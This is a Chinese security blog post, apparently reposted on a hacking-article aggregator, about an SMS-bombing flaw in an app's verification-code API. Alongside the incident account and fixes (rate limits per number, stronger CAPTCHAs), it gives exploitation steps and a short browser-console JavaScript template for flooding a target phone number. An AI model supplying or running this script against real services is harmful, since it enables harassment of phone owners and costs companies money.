记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

短信接口处理不当,被狂刷上万短信

2016-03-15 03:45

 

    叮!“通知信息:验证码(8694),用于验证(15分钟内有效)……

    相信大家对这种短信都不陌生,很多企业为了验证用户真实性,注册时要求填写手机号码进行短信验证。但是,如果短信发送接口没处理好,就会被利用制成短信轰炸的工具。

    通过以下事件简单了解:

XAPP应用在比戈大牛网爆出存在短信接口处理不当的漏洞,被恶意利用制作成短信轰炸工具,疯狂发送验证短信轰炸用户,直到爱X蜂官方发现时,已损失上万条短信。

 

    在各大安全平台上,短信轰炸相关的漏洞亦不在少数。据比戈大牛网的安全运营提供的信息得知,此类漏洞较为常见,但通报企业后并未引起重视,迟迟未修复。漏洞一旦被恶意利用,导致企业短信资源浪费,也给用户造成严重的骚扰。

 

—————————————————我是分割线————————————————–

 

短信轰炸是利用企业发送短信的接口未作任何限制的漏洞,可不限时无限次或者短时间内多次发送验证短信至目标手机号码,达到轰炸骚扰的目的;同时,企业也浪费了大量的可用短信资源。  

   漏洞案例:http://www.bigniu.com/bug/view/33

 

【利用方式】

1.发掘短信接口,限制少的效果越好;

2.抓包,常见的抓包软件有wiresharkfiddlerhttpwatcher等;

3.POST,将写好的内容提交上去,一次简单的短信发送完成;

    4.批量提交,形成轰炸效果。

 

漏洞利用示例代码:

    sendMsg('这里填写要炸的手机号码');

    function sendMsg(phone) {

    var urls = [

    '这里填写短信接口' + phone

    ];

    for(var i in urls) { 

    new Image().src = urls[i];

    }

    }

将第一行代码字符串为要轰炸的手机号码以及第四行代码字符串为短信调用接口,然后全选复制到浏览器F12控制台中(Console)执行即可。

注:以上代码仅作技术研究用!请勿用作任何非法用途!

 

【漏洞危害】

1、对于个人:短时间内接收到大量无用短信,造成干扰;

2、对于企业:漏洞一旦被恶意利用大量发送后,造成经济损失。

 

【漏洞修补】

1、同一手机号限定时间段限定发送次数,如每天发送5次,可结合用户体验综合考虑;

2、设置更为完善的验证码机制。

 

    随着移动互联网的兴起,针对手机应用的漏洞攻击愈发增多。比戈大牛网立志于改善移动互联网信息安全,为移动互联网信息安全研究者提供一个研究平台,有偿征集android系统以及android应用漏洞,奖金丰厚,欢迎广大白帽前来交流学习,一起为信息安全而努力!

 

本文出自于比戈大牛,转载请注明出处。


知识来源: www.evil0x.com/posts/15059.html

阅读:225436 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“短信接口处理不当,被狂刷上万短信”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁